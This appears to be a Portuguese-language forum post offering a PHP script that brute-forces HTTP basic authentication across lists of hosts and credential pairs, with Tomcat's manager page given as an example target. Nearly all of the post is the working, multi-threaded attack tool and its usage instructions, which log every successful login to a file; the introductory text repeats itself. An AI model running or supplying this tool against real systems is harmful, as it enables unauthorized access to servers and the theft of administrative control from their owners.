Olá à todos!
Aqui um simples script para brute em http auth's.
Com um simples parse da resposta http obtida podemos obter o redirecionamento de login:senha corretos (:
Uso:
Code:
[]'s
Aqui um simples script para brute em http auth's.
Com um simples parse da resposta http obtida podemos obter o redirecionamento de login:senha corretos (:
Uso:
php auth_brute.php host_list user_list thread
Código PHP:
<?php
/*
* Simple http brute by n4sss.
* To brute simple auth's :3
*
* Tomcat example:
* http://localhost:8080/manager/html
*
* etc.
*
*
* */
function save_buf($content, $file){
$fp = fopen($file, "a");
fwrite($fp, $content."\n");
fclose($fp);
}
function http_brute($list, $users, $thread){
foreach($users as $common){
$multi = curl_multi_init();
$th = array_chunk($list, $thread);
foreach($th as $request){
for($i=0;$i<=count($request)-1;$i++){
if(!empty($request[$i]) && !empty($common))
{
print "- Bruting -> {$request[$i]} -> {$common}\n";
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_URL, "$request[$i]");
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl[$i], CURLOPT_USERPWD, "$common");
curl_setopt($curl[$i], CURLOPT_HTTPAUTH, CURLAUTH_ANY);
curl_setopt($curl[$i], CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl[$i], CURLOPT_FOLLOWLOCATION, true);
curl_multi_add_handle($multi, $curl[$i]);
}
}
}
do{
curl_multi_exec($multi, $handle);
usleep(1);
}while($handle>0);
foreach($curl as $curl_id => $content){
$info = curl_getinfo($content);
curl_multi_remove_handle($multi, $content);
if($info['http_code'] == 200){
print "[+] $common -> $request[$curl_id]\n";
save_buf("$request[$curl_id] -> $common", "Bruteds_auth.txt");
print "Writed to -> Bruteds_auth.txt\n";
}
}
}
}
if(@!$argv[1] || @!$argv[2]){
print "-= Http auth brute by n4sss =-\n";
print "To use:\n";
print "php $argv[0] host_list user_list thread\n";
print "----------------------------------------\n";
print "User type: admin:admin\n";
print " admin:123456\n";
print " admin:4dm1n\n";
print "Example:\n";
print "php $argv[0] 200_210 user_list 10\n";
}else{
$list = array_filter(explode("\n", file_get_contents("$argv[1]")));
$users = explode("\n", file_get_contents("$argv[2]"));
$thread = trim("$argv[3]");
print "-= Http auth brute by n4sss =-\n";
print "When we brute hosts, results can be founds at -> Bruteds_auth.txt\n";
print "[+] Good luck\n";
sleep(4);
http_brute($list, $users, $thread);
}
?>